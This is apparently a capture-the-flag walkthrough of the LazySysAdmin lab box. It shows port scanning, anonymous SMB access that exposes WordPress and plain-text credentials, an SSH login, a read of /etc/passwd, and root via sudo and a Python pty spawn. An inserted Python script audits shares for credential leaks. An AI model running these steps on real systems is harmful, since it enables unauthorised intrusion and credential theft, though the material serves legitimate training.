LazySysAdmin Walkthrough

Pulkit Marele
3 min read · Dec 24, 2020

I personally enjoyed playing with this box; it taught me how to stay focused while doing enumeration and exploitation. There's so much going on with this box for post exploitation. Let's pwn it!

Network Scanning

We always start with network scanning. Let's find the target IP address by running netdiscover.

┌─[✗]─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0

As we saw in the netdiscover result, our target IP address is 192.168.43.15.

Enumeration/Reconnaissance

Our next step is scanning the target machine. Let's start with nmap.

┌─[✗]─[root@RDX]─[~]
└──╼#nmap -v -sT 192.168.43.15

With the help of nmap we are able to scan all open TCP ports.
Starting with ports 139 and 445, which are SMB:

┌─[✗]─[root@RDX]─[~]
└──╼#smbclient -L //192.168.43.15

We can use smbclient to list and access file shares on the network. Here we are able to log in successfully using anonymous login, and now we can access the 'share$' share.

┌─[✗]─[root@RDX]─[~]
└──╼ #smbclient '\\192.168.43.15/share$'

smb: \> ls

smb: \> get deets.txt

smb: \> get robots.txt

smb: \> ls

smb: \> cd wordpress\

smb: \wordpress\> ls

smb: \wordpress\> get wp-config.php

┌─[✗]─[root@RDX]─[~]
└──╼ #cat wp-config.php

('DB_USER', 'Admin');

('DB_PASSWORD', 'TogieMYSQL12345^^');

Open http://192.168.43.124/wordpress in the browser.

Now I have my user.

┌─[root@RDX]─[~]
└──╼ #cat deets.txt
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

Then, from the WordPress user, find the user for the SSH login:

user: togie
password: 12345
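The two leaks above (database credentials in a wp-config.php sitting on an anonymous share, and a password written into a plain-text note) are exactly what an admin should audit a share for before exposing it. The following is an added example, not code from the original walkthrough: it walks a local copy of the share and reports credential leaks by file and kind without echoing the secret itself. The sample files are constructed inline (mirroring what the walkthrough found) so it runs offline; the weak-password heuristic is an assumption of this example.

```python
import re
import tempfile
from pathlib import Path

# define('DB_PASSWORD', 'value');  as written in a WordPress wp-config.php
WP_DEFINE = re.compile(r"define\(\s*'([A-Z_]+)'\s*,\s*'([^']*)'\s*\)")
# "Password 12345", "passwd: x", "password = y" in notes; the token must contain
# a digit or symbol so prose like "update your password after" is not flagged
NOTE_PW = re.compile(r"\bpass(?:word|wd)?\b[ \t:=-]*(\S*[^A-Za-z\s]\S*)", re.IGNORECASE)
SENSITIVE_KEYS = {"DB_USER", "DB_PASSWORD", "AUTH_KEY", "SECURE_AUTH_KEY"}

def weak_password(pw: str) -> bool:
    """Assumed heuristic: short, all-digit or dictionary-word passwords are a reuse risk."""
    return len(pw) < 12 or pw.isdigit() or pw.lower() in {"password", "admin", "letmein"}

def audit_share(root: Path) -> list[dict]:
    """Walk a local copy of the share; report leaks as (file, kind, weak) without the value."""
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = str(path.relative_to(root))
        text = path.read_text(encoding="utf-8", errors="replace")
        if path.name == "wp-config.php":
            for key, value in WP_DEFINE.findall(text):
                if key in SENSITIVE_KEYS:
                    is_secret = key != "DB_USER"  # a username is a leak, but has no strength
                    findings.append({"file": rel, "kind": key, "weak": is_secret and weak_password(value)})
        elif path.suffix in {".txt", ".md", ""}:
            for m in NOTE_PW.finditer(text):
                findings.append({"file": rel, "kind": "NOTE_PASSWORD", "weak": weak_password(m.group(1))})
    return findings

def run_demo() -> list[dict]:
    """Build a constructed copy of the share (contents mirror the walkthrough) and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wordpress").mkdir()
        (root / "wordpress" / "wp-config.php").write_text(
            "<?php\ndefine('DB_NAME', 'wordpress');\n"
            "define('DB_USER', 'Admin');\ndefine('DB_PASSWORD', 'TogieMYSQL12345^^');\n")
        (root / "deets.txt").write_text(
            "CBF Remembering all these passwords.\n\n"
            "Remember to remove this file and update your password after we push out the server.\n\n"
            "Password 12345\n")
        (root / "robots.txt").write_text("User-agent: *\nDisallow: /wordpress/\n")
        return audit_share(root)

if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

The note in deets.txt is flagged as a weak password leak while the wp-config.php database password is flagged as a leak but not as weak, which matches what the box actually exposes.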

┌─[root@RDX]─[~]
└──╼ #ssh togie@192.168.43.15

togie@LazySysAdmin:~$ id

togie@LazySysAdmin:~$ cat /etc/passwd

Privilege Escalation

Two ways to root the machine:

1.

togie@LazySysAdmin:~$ sudo -i
[sudo] password for togie:
root@LazySysAdmin:~# id

uid=0(root) gid=0(root) groups=0(root)

2.

togie@LazySysAdmin:~$ sudo python -c 'import pty;pty.spawn("/bin/bash")'
[sudo] password for togie:

root@LazySysAdmin:~# id

uid=0(root) gid=0(root) groups=0(root)

root@LazySysAdmin:~# cat proof.txt
